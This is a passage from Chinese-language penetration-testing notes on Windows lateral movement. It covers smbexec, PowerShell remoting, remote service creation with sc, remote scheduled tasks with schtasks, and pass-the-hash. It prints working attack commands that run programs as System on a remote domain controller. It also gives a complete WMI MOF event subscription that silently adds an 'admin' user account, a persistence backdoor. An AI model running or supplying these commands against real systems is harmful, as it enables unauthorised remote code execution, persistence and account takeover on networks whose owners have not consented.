</code></pre><p><img src="pic/6/4.jpg" alt=""></p><p>想更详细了解的可以看看：<a href="https://www.91ri.org/12908.html">https://www.91ri.org/12908.html</a></p><h5 id="smbexec"><a name="smbexec" href="#smbexec"></a>smbexec</h5><p>这个可以根据其他共享(c$、ipc$)来获取一个cmd</p><pre><code data-origin="<pre><code>先把execserver.exe复制到目标的windows目录下,然后本机执行
test.exe ip user pass command sharename
</code></pre>">先把execserver.exe复制到目标的windows目录下,然后本机执行
test.exe ip user pass command sharename
</code></pre><p><img src="pic/6/5.jpg" alt=""></p><h5 id="powershell-remoting"><a name="powershell-remoting" href="#powershell-remoting"></a>powershell remoting</h5><p>感觉实质上还是操作wmi实现的一个执行程序</p><p><a href="https://github.com/samratashok/nishang/blob/5da8e915fcd56fc76fc16110083948e106486af0/Shells/Invoke-PowerShellWmi.ps1">https://github.com/samratashok/nishang/blob/5da8e915fcd56fc76fc16110083948e106486af0/Shells/Invoke-PowerShellWmi.ps1</a></p><h5 id="sc创建服务执行"><a name="sc创建服务执行" href="#sc创建服务执行"></a>SC创建服务执行</h5><p>一定要注意的是binpath这些设置的后面是有一个<strong>空格</strong>的</p><pre><code data-origin="<pre><code>1、系统权限(其中test为服务名)
sc \\DC1 create test binpath= c:\cmd.exe
sc \\DC1 start test
sc \\DC1 delete test

2.指定用户权限启动
sc \\DC1 create test binpath = &quot;c:\1.exe&quot; obj= &quot;centoso\administrator&quot; passwrod= test
sc \\DC1 start test
</code></pre>">1、系统权限(其中test为服务名)
sc \\DC1 create test binpath= c:\cmd.exe
sc \\DC1 start test
sc \\DC1 delete test

2.指定用户权限启动
sc \\DC1 create test binpath = "c:\1.exe" obj= "centoso\administrator" passwrod= test
sc \\DC1 start test
</code></pre><h5 id="schtasks"><a name="schtasks" href="#schtasks"></a>schtasks</h5><p>schtasks计划任务远程运行</p><pre><code data-origin="<pre><code>命令原型：
schtasks /create /tn TaskName /tr TaskRun /sc schedule [/mo modifier] [/d day] [/m month[,month...] [/i IdleTime] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | &quot;System&quot;} [/rp Password]] /?

For example:
schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System
schtasks /run /tn foobar /S host
schtasks /F /delete /tn foobar /S host
</code></pre>">命令原型：
schtasks /create /tn TaskName /tr TaskRun /sc schedule [/mo modifier] [/d day] [/m month[,month...] [/i IdleTime] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]] /?

For example:
schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System
schtasks /run /tn foobar /S host
schtasks /F /delete /tn foobar /S host
</code></pre><p>验证失败：win03连到08,xp连到08,xp连到03(但是并没有真正的成功执行,不知道是不是有姿势错了)<br><img src="pic/6/6.jpg" alt=""></p><p>更多用法：<a href="http://www.feiesoft.com/windows/cmd/schtasks.htm">http://www.feiesoft.com/windows/cmd/schtasks.htm</a></p><h5 id="smb+mof-||-dll-hijacks"><a name="smb+mof-||-dll-hijacks" href="#smb+mof-||-dll-hijacks"></a>SMB+MOF || DLL Hijacks</h5><p>其实这个思路一般都有用到的,比如在mof提权(上传mof文件到c:/windows/system32/wbem/mof/mof.mof)中,lpk_dll劫持<br>不过测试添加账号成功…执行文件缺失败了</p><pre><code data-origin="<pre><code>#pragma namespace(&quot;\\\\.\\root\\subscription&quot;)

instance of __EventFilter as $EventFilter
{
    EventNamespace = &quot;Root\\Cimv2&quot;;
    Name  = &quot;filtP2&quot;;
    Query = &quot;Select * From __InstanceModificationEvent &quot;
            &quot;Where TargetInstance Isa \&quot;Win32_LocalTime\&quot; &quot;
            &quot;And TargetInstance.Second = 5&quot;;
    QueryLanguage = &quot;WQL&quot;;
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = &quot;consPCSV2&quot;;
    ScriptingEngine = &quot;JScript&quot;;
    ScriptText =
    &quot;var WSH = new ActiveXObject(\&quot;WScript.Shell\&quot;)\nWSH.run(\&quot;net.exe user admin adminaz1 /add\&quot;)&quot;;
};
instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
</code></pre>">#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin adminaz1 /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
</code></pre><h5 id="pth-+-compmgmt.msc"><a name="pth-+-compmgmt.msc" href="#pth-+-compmgmt.msc"></a>PTH + compmgmt.msc</h5><p><img src="pic/6/7.jpg" alt=""></p><p><a href="http://drops.wooyun.org/tips/7358">http://drops.wooyun.org/tips/7358</a></p>

<footer style="position:fixed; font-size:.8em; text-align:right; bottom:0px; margin-left:-25px; height:20px; width:100%;">generated by <a href="http://pad.haroopress.com" target="_blank">haroopad</a></footer>
</body>
</html>